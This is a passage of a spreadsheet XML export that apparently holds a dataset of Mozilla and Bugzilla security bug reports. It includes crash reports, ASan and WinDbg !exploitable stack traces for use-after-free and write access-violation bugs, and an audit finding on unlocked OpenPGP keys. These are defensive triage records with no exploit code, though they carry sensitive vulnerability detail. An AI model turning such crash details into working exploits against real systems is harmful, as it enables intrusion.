      <c r="E5258" t="n">
        <v>1</v>
      </c>
      <c r="F5258" t="n">
        <v>1</v>
      </c>
      <c r="G5258" t="n">
        <v>3</v>
      </c>
      <c r="H5258" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5258" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5258" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K5258" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5258" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5258" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5258" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5258" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5258" t="inlineStr">
        <is>
          <t>[adv-main32+][adv-esr31.1+]</t>
        </is>
      </c>
      <c r="Q5258" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5258" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5258" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T5258" t="n">
        <v>1</v>
      </c>
      <c r="U5258" t="n">
        <v>0</v>
      </c>
      <c r="V5258" t="n">
        <v>32</v>
      </c>
      <c r="W5258" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1002340 +++
1. Load the testcase in an ASan build of Firefox
2. Quit Firefox
On Nightly we (once again) have crashes in the MediaStreamGraph Resampler code.  I can repro on opt builds only; a noopt build never hits it.
I'll attach a stack.
Strongly suspect that the Graph is going away while we're still pushing audio into it.</t>
        </is>
      </c>
      <c r="X5258" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5259">
      <c r="A5259" t="n">
        <v>1021312</v>
      </c>
      <c r="B5259" t="inlineStr">
        <is>
          <t>2014-06-05 15:30:02 -0700</t>
        </is>
      </c>
      <c r="C5259" t="inlineStr">
        <is>
          <t>Zone Mismatch in CloneNonReflectors</t>
        </is>
      </c>
      <c r="D5259" t="inlineStr">
        <is>
          <t>2016-02-16 16:14:31 -0800</t>
        </is>
      </c>
      <c r="E5259" t="n">
        <v>1</v>
      </c>
      <c r="F5259" t="n">
        <v>1</v>
      </c>
      <c r="G5259" t="n">
        <v>3</v>
      </c>
      <c r="H5259" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5259" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5259" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K5259" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5259" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5259" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5259" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5259" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5259" t="inlineStr">
        <is>
          <t>[adv-main31+][qa-]</t>
        </is>
      </c>
      <c r="Q5259" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5259" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5259" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T5259" t="n">
        <v>1</v>
      </c>
      <c r="U5259" t="n">
        <v>0</v>
      </c>
      <c r="V5259" t="n">
        <v>16</v>
      </c>
      <c r="W5259" t="inlineStr">
        <is>
          <t>CloneNonReflectors currently assumes that it only needs to worry about compartments in the v.isObject() case. However, we can still get mismatches with cross-zone strings. The solution is to wrap the string, which causes non-interned strings to be copied into the target zone.
The mismatch is mitigated to sec-moderate because this can only be triggered by a privileged API that doesn't currently have any in-tree consumers.</t>
        </is>
      </c>
      <c r="X5259" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5260">
      <c r="A5260" t="n">
        <v>516709</v>
      </c>
      <c r="B5260" t="inlineStr">
        <is>
          <t>2009-09-15 07:57:24 -0700</t>
        </is>
      </c>
      <c r="C5260" t="inlineStr">
        <is>
          <t>Exploitable - User Mode Write AV starting at USP10!LoadCmapFontGlyphs+0x0000000000000059</t>
        </is>
      </c>
      <c r="D5260" t="inlineStr">
        <is>
          <t>2011-01-27 11:27:17 -0800</t>
        </is>
      </c>
      <c r="E5260" t="n">
        <v>1</v>
      </c>
      <c r="F5260" t="n">
        <v>1</v>
      </c>
      <c r="G5260" t="n">
        <v>3</v>
      </c>
      <c r="H5260" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5260" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5260" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K5260" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L5260" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5260" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5260" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5260" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5260" t="inlineStr">
        <is>
          <t>[sg:vector-critical][MS ref: 9458mh --keep private until their patch, ETA ~May 2010]</t>
        </is>
      </c>
      <c r="Q5260" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5260" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5260" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5260" t="n">
        <v>1</v>
      </c>
      <c r="U5260" t="n">
        <v>0</v>
      </c>
      <c r="V5260" t="n">
        <v>31</v>
      </c>
      <c r="W5260" t="inlineStr">
        <is>
          <t>Created attachment 400764
more detailed information (stack) from windbg/!exploitable
1.9.1 Nightly Debug Build
steps to reproduce:
-&gt; Load http://www.laserwords.com/commercial.php in a debugger
--&gt; !exploitable report a problem
93c.c18): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ffff0104 ebx=0519e7c8 ecx=00000000 edx=00baad04 esi=05196578 edi=ffff0105
eip=74da6e19 esp=00126448 ebp=00126458 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
USP10!LoadCmapFontGlyphs+0x59:
74da6e19 66893c53        mov     word ptr [ebx+edx*2],di  ds:0023:068f41d0=????
0:000&gt; !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x68f41d0
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation
Exception Hash (Major/Minor): 0x287e0601.0x7074110b
Stack Trace:
USP10!LoadCmapFontGlyphs+0x59
USP10!FillCMAP+0x36
USP10!LoadFont+0x1de
USP10!FindOrCreateFaceCache+0x9c
USP10!FindOrCreateSizeCacheWithoutRealizationID+0xc7
USP10!FindOrCreateSizeCacheUsingRealizationID+0x5d
USP10!UpdateCache+0x2c
USP10!ScriptCheckCache+0x67
USP10!ScriptShape+0x88
thebes!UniscribeItem::ShapeUniscribe+0x11a
thebes!UniscribeItem::Shape+0x3a
thebes!gfxWindowsFontGroup::InitTextRunUniscribe+0x19b
thebes!gfxWindowsFontGroup::MakeTextRun+0x169
thebes!TextRunWordCache::MakeTextRun+0x7bb
thebes!gfxTextRunWordCache::MakeTextRun+0x2f
gklayout!MakeTextRun+0x77
gklayout!BuildTextRunsScanner::BuildTextRunForFrames+0xcef
gklayout!BuildTextRunsScanner::FlushFrames+0x1f6
gklayout!BuildTextRuns+0x656
gklayout!nsTextFrame::EnsureTextRun+0xb2
gklayout!nsTextFrame::Reflow+0x420
gklayout!nsLineLayout::ReflowFrame+0x3ab
gklayout!nsBlockFrame::ReflowInlineFrame+0x5e
gklayout!nsBlockFrame::DoReflowInlineFrames+0x210
gklayout!nsBlockFrame::ReflowInlineFrames+0xf2
gklayout!nsBlockFrame::ReflowLine+0x2c2
gklayout!nsBlockFrame::ReflowDirtyLines+0x561
gklayout!nsBlockFrame::Reflow+0x251
gklayout!nsBlockReflowContext::ReflowBlock+0x1a3
gklayout!nsBlockFrame::ReflowBlockFrame+0x6b3
gklayout!nsBlockFrame::ReflowLine+0xd2
gklayout!nsBlockFrame::ReflowDirtyLines+0x561
gklayout!nsBlockFrame::Reflow+0x251
gklayout!nsBlockReflowContext::ReflowBlock+0x1a3
gklayout!nsBlockFrame::ReflowBlockFrame+0x6b3
gklayout!nsBlockFrame::ReflowLine+0xd2
gklayout!nsBlockFrame::ReflowDirtyLines+0x561
gklayout!nsBlockFrame::Reflow+0x251
gklayout!nsBlockReflowContext::ReflowBlock+0x1a3
gklayout!nsBlockFrame::ReflowBlockFrame+0x6b3
gklayout!nsBlockFrame::ReflowLine+0xd2
gklayout!nsBlockFrame::ReflowDirtyLines+0x561
gklayout!nsBlockFrame::Reflow+0x251
gklayout!nsBlockReflowContext::ReflowBlock+0x1a3
gklayout!nsBlockFrame::ReflowBlockFrame+0x6b3
gklayout!nsBlockFrame::ReflowLine+0xd2
gklayout!nsBlockFrame::ReflowDirtyLines+0x561
gklayout!nsBlockFrame::Reflow+0x251
gklayout!nsBlockReflowContext::ReflowBlock+0x1a3
gklayout!nsBlockFrame::ReflowBlockFrame+0x6b3
gklayout!nsBlockFrame::ReflowLine+0xd2
gklayout!nsBlockFrame::ReflowDirtyLines+0x561
gklayout!nsBlockFrame::Reflow+0x251
gklayout!nsBlockReflowContext::ReflowBlock+0x1a3
gklayout!nsBlockFrame::ReflowBlockFrame+0x6b3
gklayout!nsBlockFrame::ReflowLine+0xd2
gklayout!nsBlockFrame::ReflowDirtyLines+0x561
gklayout!nsBlockFrame::Reflow+0x251
gklayout!nsBlockReflowContext::ReflowBlock+0x1a3
gklayout!nsBlockFrame::ReflowBlockFrame+0x6b3
gklayout!nsBlockFrame::ReflowLine+0xd2
gklayout!nsBlockFrame::ReflowDirtyLines+0x561
gklayout!nsBlockFrame::Reflow+0x251
gklayout!nsContainerFrame::ReflowChild+0xe9
Instruction Address: 0x0000000074da6e19
Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at USP10!LoadCmapFontGlyphs+0x0000000000000059 (Hash=0x287e0601.0x7074110b)
User mode write access violations that are not near NULL are exploitable.</t>
        </is>
      </c>
      <c r="X5260" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5261">
      <c r="A5261" t="n">
        <v>1296004</v>
      </c>
      <c r="B5261" t="inlineStr">
        <is>
          <t>2016-08-17 08:42:39 -0700</t>
        </is>
      </c>
      <c r="C5261" t="inlineStr">
        <is>
          <t>Disable bug 1186948 (via pref)</t>
        </is>
      </c>
      <c r="D5261" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E5261" t="n">
        <v>1</v>
      </c>
      <c r="F5261" t="n">
        <v>1</v>
      </c>
      <c r="G5261" t="n">
        <v>6</v>
      </c>
      <c r="H5261" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5261" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5261" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K5261" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5261" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5261" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5261" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5261" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5261" t="inlineStr"/>
      <c r="Q5261" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5261" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5261" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T5261" t="n">
        <v>1</v>
      </c>
      <c r="U5261" t="n">
        <v>0</v>
      </c>
      <c r="V5261" t="n">
        <v>13</v>
      </c>
      <c r="W5261" t="inlineStr">
        <is>
          <t>Bug 1186948 is not ready to ship: we're seeing both false-negatives, bug 1294341, as well as false positives, bug 1295984, and I believe the risk of shipping this is high because it could make it difficult for us to release vulnerable plugin blocks.
We're going to keep evaluating and experimenting, but turn this off by default for now.</t>
        </is>
      </c>
      <c r="X5261" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5262">
      <c r="A5262" t="n">
        <v>269398</v>
      </c>
      <c r="B5262" t="inlineStr">
        <is>
          <t>2004-11-12 05:12:59 -0800</t>
        </is>
      </c>
      <c r="C5262" t="inlineStr">
        <is>
          <t>request.cgi fails with error in SQL when no products available for user</t>
        </is>
      </c>
      <c r="D5262" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:42 -0800</t>
        </is>
      </c>
      <c r="E5262" t="n">
        <v>1</v>
      </c>
      <c r="F5262" t="n">
        <v>1</v>
      </c>
      <c r="G5262" t="n">
        <v>4</v>
      </c>
      <c r="H5262" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5262" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5262" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5262" t="inlineStr">
        <is>
          <t>2.18</t>
        </is>
      </c>
      <c r="L5262" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5262" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5262" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5262" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5262" t="inlineStr"/>
      <c r="Q5262" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5262" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5262" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5262" t="n">
        <v>1</v>
      </c>
      <c r="U5262" t="n">
        <v>0</v>
      </c>
      <c r="V5262" t="n">
        <v>9</v>
      </c>
      <c r="W5262" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686) Opera 7.54  [ru]
Build Identifier: 
This happens when all products restricted to their groups (selected 'Entry' and 
'Canedit') and a user that don't belongs to any of this groups attemps to query 
'My requests'. request.cgi does't handle situation when no products returned by 
query.
DBD::mysql::st execute failed: You have an error in your SQL syntax.  Check the 
manual that corresponds to your MySQL server version for the right syntax to use 
near ') ORDER BY name' at line 1 [for Statement "SELECT name, product_id FROM 
components WHERE product_id IN () ORDER BY name"] at Bugzilla/DB.pm line 62
        Bugzilla::DB::SendSQL('SELECT name, product_id FROM components WHERE 
product_id IN (...') called at globals.pl line 592
        main::GetSelectableProductHash() called at /var/www/html/bugzilla/
request.cgi line 263
        main::queue() called at /var/www/html/bugzilla/request.cgi line 50
Reproducible: Always
Steps to Reproduce:
1.For each product in Group Access Controls set 'Entry' and 'Canedit' flags.
2.Login as user that don't belongs to any of this groups.
3.Press 'My requests' link
This affects version 2.18rc3</t>
        </is>
      </c>
      <c r="X5262" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5263">
      <c r="A5263" t="n">
        <v>1673239</v>
      </c>
      <c r="B5263" t="inlineStr">
        <is>
          <t>2020-10-25 05:15:19 -0700</t>
        </is>
      </c>
      <c r="C5263" t="inlineStr">
        <is>
          <t>RNP-01-012 WP1 Thunderbird: Logic issue potentially leaves key material unlocked (Medium)</t>
        </is>
      </c>
      <c r="D5263" t="inlineStr">
        <is>
          <t>2021-08-07 22:43:21 -0700</t>
        </is>
      </c>
      <c r="E5263" t="n">
        <v>1</v>
      </c>
      <c r="F5263" t="n">
        <v>1</v>
      </c>
      <c r="G5263" t="n">
        <v>3</v>
      </c>
      <c r="H5263" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5263" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J5263" t="inlineStr">
        <is>
          <t>Security: OpenPGP</t>
        </is>
      </c>
      <c r="K5263" t="inlineStr">
        <is>
          <t>78</t>
        </is>
      </c>
      <c r="L5263" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5263" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5263" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5263" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5263" t="inlineStr"/>
      <c r="Q5263" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5263" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5263" t="inlineStr">
        <is>
          <t>87 Branch</t>
        </is>
      </c>
      <c r="T5263" t="n">
        <v>1</v>
      </c>
      <c r="U5263" t="n">
        <v>0</v>
      </c>
      <c r="V5263" t="n">
        <v>10</v>
      </c>
      <c r="W5263" t="inlineStr">
        <is>
          <t>During the audit of the RNP source code, it was discovered that there is a potential logic flaw related to locking/unlocking and protecting/unprotecting keys. The function - named rnp_key_unlock() - unlocks a key and has secret key material for use without password protection. This puts all values into memory so the key becomes usable for corresponding operations (e.g. changing attributes or exporting keys).
As an example, the flow of operations is as follows:
1. Unlock the key by invoking rnp_key_unlock()
2. Perform some operations on the key, e.g. export it by using rnp_key_export()
3. Lock the key again by invoking rnp_key_lock()
It was identified that the rnp_key_lock() might not be invoked in case the desired operation, in the example above rnp_key_export(), is running into an error. This situation potentially allows an attacker to perform operations on already unlocked keys, without needing to unlock them beforehand.
A similar pattern has been observed for rnp_key_protect/rnp_key_unprotect(), which gets invoked when keys are imported through importKeyBlockImpl(). A protected key is encrypted and can be safely held in memory. Invoking rnp_key_unprotect() on a given key removes the encryption from the key.
***Affected File:***
comm/mail/extensions/openpgp/content/modules/RNP.jsm
***Affected Code:***
refer to Attachment 9182160
Locking/protecting the keys in case an operation performed on an unlocked/unprotected key fails is important because it reduces the potential risk of having unlocked/unprotected keys in memory. Therefore, it is recommended to properly catch any occurring exceptions and re-lock/protect keys again.</t>
        </is>
      </c>
      <c r="X5263" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5264">
      <c r="A5264" t="n">
        <v>786111</v>
      </c>
      <c r="B5264" t="inlineStr">
        <is>
          <t>2012-08-27 17:07:23 -0700</t>
        </is>
      </c>
      <c r="C5264" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsSMILAnimationController::DoSample</t>
        </is>
      </c>
      <c r="D5264" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:42 -0700</t>
        </is>
      </c>
      <c r="E5264" t="n">
        <v>1</v>
      </c>
      <c r="F5264" t="n">
        <v>1</v>
      </c>
      <c r="G5264" t="n">
        <v>3</v>
      </c>
      <c r="H5264" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5264" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5264" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K5264" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5264" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5264" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5264" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5264" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5264" t="inlineStr">
        <is>
          <t>[asan][qa-][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q5264" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5264" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5264" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T5264" t="n">
        <v>1</v>
      </c>
      <c r="U5264" t="n">
        <v>0</v>
      </c>
      <c r="V5264" t="n">
        <v>36</v>
      </c>
      <c r="W5264" t="inlineStr">
        <is>
          <t>Created attachment 655825
Testcase
Reproduces on trunk. Reliable reproduce this by launching multiple instances of firefox with the same testcase. on my fast box, i needed like 15.
=================================================================
==10320== ERROR: AddressSanitizer heap-use-after-free on address 0x7f2197da95d0 at pc 0x7f21c591cd12 bp 0x7ffff4c086b0 sp 0x7ffff4c086a8
READ of size 4 at 0x7f2197da95d0 thread T0
    #0 0x7f21c591cd11 in PL_DHashTableEnumerate src/objdir-ff-asan-sym/xpcom/build/pldhash.cpp:714
    #1 0x7f21c0d411d2 in nsTHashtable&lt;nsSMILCompositor&gt;::EnumerateEntries(PLDHashOperator (*)(nsSMILCompositor*, void*), void*) src/../../dist/include/nsTHashtable.h:237
    #2 0x7f21c0d43762 in nsSMILAnimationController::DoSample(bool) src/content/smil/nsSMILAnimationController.cpp:437
    #3 0x7f21baadbc47 in nsSMILAnimationController::Resample() src/../../../../dist/include/nsSMILAnimationController.h:66
    #4 0x7f21baa4930d in nsSMILAnimationController::FlushResampleRequests() src/../../../../dist/include/nsSMILAnimationController.h:84
    #5 0x7f21baa47fbe in PresShell::FlushPendingNotifications(mozFlushType) src/layout/base/nsPresShell.cpp:3846
    #6 0x7f21bb16d5aa in nsHideViewer::Run() src/layout/generic/nsSubDocumentFrame.cpp:810
    #7 0x7f21bc09650d in nsContentUtils::RemoveScriptBlocker() src/content/base/src/nsContentUtils.cpp:4961
    #8 0x7f21ba679a3a in ~nsAutoScriptBlocker src/../../../dist/include/nsContentUtils.h:2276
    #9 0x7f21ba664432 in ~nsAutoScriptBlocker src/../../../dist/include/nsContentUtils.h:2275
    #10 0x7f21bc2a34a1 in nsDocument::AdoptNode(nsIDOMNode*, nsIDOMNode**) src/content/base/src/nsDocument.cpp:6227
    #11 0x7f21c133969d in nsIDOMDocument_AdoptNode(JSContext*, unsigned int, JS::Value*) src/objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:3467
    #12 0x7f21cc8bf951 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:372
    #13 0x7f21cc84ca41 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2413
    #14 0x7f21cc7b3a35 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:309
    #15 0x7f21cc8ccc66 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) src/js/src/jsinterp.cpp:494
    #16 0x7f21cc8cec1e in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) src/js/src/jsinterp.cpp:531
    #17 0x7f21cc026334 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) src/js/src/jsapi.cpp:5665
    #18 0x7f21cc02b2d1 in JS_EvaluateUCScriptForPrincipalsVersionOrigin src/js/src/jsapi.cpp:5746
    #19 0x7f21be34f62f in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) src/dom/base/nsJSEnvironment.cpp:1497
    #20 0x7f21be4ff1bf in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) src/dom/base/nsGlobalWindow.cpp:9590
    #21 0x7f21be4b6b39 in nsGlobalWindow::RunTimeout(nsTimeout*) src/dom/base/nsGlobalWindow.cpp:9851
    #22 0x7f21be4fd21a in nsGlobalWindow::TimerCallback(nsITimer*, void*) src/dom/base/nsGlobalWindow.cpp:10118
    #23 0x7f21c5ca0d22 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:473
    #24 0x7f21c5ca25d8 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:556
    #25 0x7f21c5c659ce in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:624
    #26 0x7f21c5906e27 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #27 0x7f21c46e3595 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #28 0x7f21c5f12bd9 in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:208
    #29 0x7f21c5f12a22 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:201
    #30 0x7f21c5f12907 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:175
    #31 0x7f21c3bad7ae in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #32 0x7f21c281e448 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:273
    #33 0x7f21b90259b0 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3800
    #34 0x7f21b902bc24 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3877
    #35 0x7f21b902ecee in XRE_main src/toolkit/xre/nsAppRunner.cpp:3953
    #36 0x40c5bb in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #37 0x409e1f in main src/browser/app/nsBrowserApp.cpp:279
    #38 0x7f21d60e6c4d in ?? ??:0
0x7f2197da95d0 is located 336 bytes inside of 896-byte region [0x7f2197da9480,0x7f2197da9800)
freed by thread T0 here:
    #0 0x4c3e30 in free ??:0
    #1 0x7f21d2f84572 in moz_free src/memory/mozalloc/mozalloc.cpp:51
    #2 0x7f21c59125d0 in PL_DHashFreeTable src/objdir-ff-asan-sym/xpcom/build/pldhash.cpp:88
    #3 0x7f21c5915ae1 in PL_DHashTableFinish src/objdir-ff-asan-sym/xpcom/build/pldhash.cpp:370
    #4 0x7f21c0d533f1 in ~nsTHashtable src/../../dist/include/nsTHashtable.h:384
    #5 0x7f21c0d53272 in ~nsTHashtable src/../../dist/include/nsTHashtable.h:382
    #6 0x7f21c0d53093 in nsAutoPtr&lt;nsTHashtable&lt;nsSMILCompositor&gt; &gt;::assign(nsTHashtable&lt;nsSMILCompositor&gt;*) src/../../dist/include/nsAutoPtr.h:38
    #7 0x7f21c0d416f7 in nsAutoPtr&lt;nsTHashtable&lt;nsSMILCompositor&gt; &gt;::operator=(nsTHashtable&lt;nsSMILCompositor&gt;*) src/../../dist/include/nsAutoPtr.h:101
    #8 0x7f21c0d43816 in nsSMILAnimationController::DoSample(bool) src/content/smil/nsSMILAnimationController.cpp:449
    #9 0x7f21c0d42e97 in nsSMILAnimationController::DoSample() src/content/smil/nsSMILAnimationController.cpp:351
    #10 0x7f21c0db7c95 in nsSMILTimeContainer::Sample() src/content/smil/nsSMILTimeContainer.cpp:176
    #11 0x7f21c0d3e5c6 in nsSMILAnimationController::Resume(unsigned int) src/content/smil/nsSMILAnimationController.cpp:94
    #12 0x7f21c0d40987 in nsSMILAnimationController::OnPageShow() src/content/smil/nsSMILAnimationController.cpp:193
    #13 0x7f21bc2bf2a8 in nsDocument::OnPageShow(bool, nsIDOMEventTarget*) src/content/base/src/nsDocument.cpp:7306
    #14 0x7f21ba862325 in DocumentViewerImpl::LoadComplete(unsigned int) src/layout/base/nsDocumentViewer.cpp:1045
    #15 0x7f21c229a6da in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, unsigned int) src/docshell/base/nsDocShell.cpp:6415
    #16 0x7f21c22925e5 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, unsigned int) src/docshell/base/nsDocShell.cpp:6246
    #17 0x7f21c22935d4 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, unsigned int) src/build/unix/stdc++compat/stdc++compat.cpp:0
    #18 0x7f21c23993e6 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, unsigned int) src/uriloader/base/nsDocLoader.cpp:1351
    #19 0x7f21c2396d13 in nsDocLoader::doStopDocumentLoad(nsIRequest*, unsigned int) src/uriloader/base/nsDocLoader.cpp:931
    #20 0x7f21c2390316 in nsDocLoader::DocLoaderIsEmpty(bool) src/uriloader/base/nsDocLoader.cpp:820
    #21 0x7f21c2397329 in nsDocLoader::ChildDoneWithOnload(nsIDocumentLoader*) src/uriloader/base/nsDocLoader.h:193
    #22 0x7f21c2390356 in nsDocLoader::DocLoaderIsEmpty(bool) src/uriloader/base/nsDocLoader.cpp:823
    #23 0x7f21c2394724 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) src/uriloader/base/nsDocLoader.cpp:704
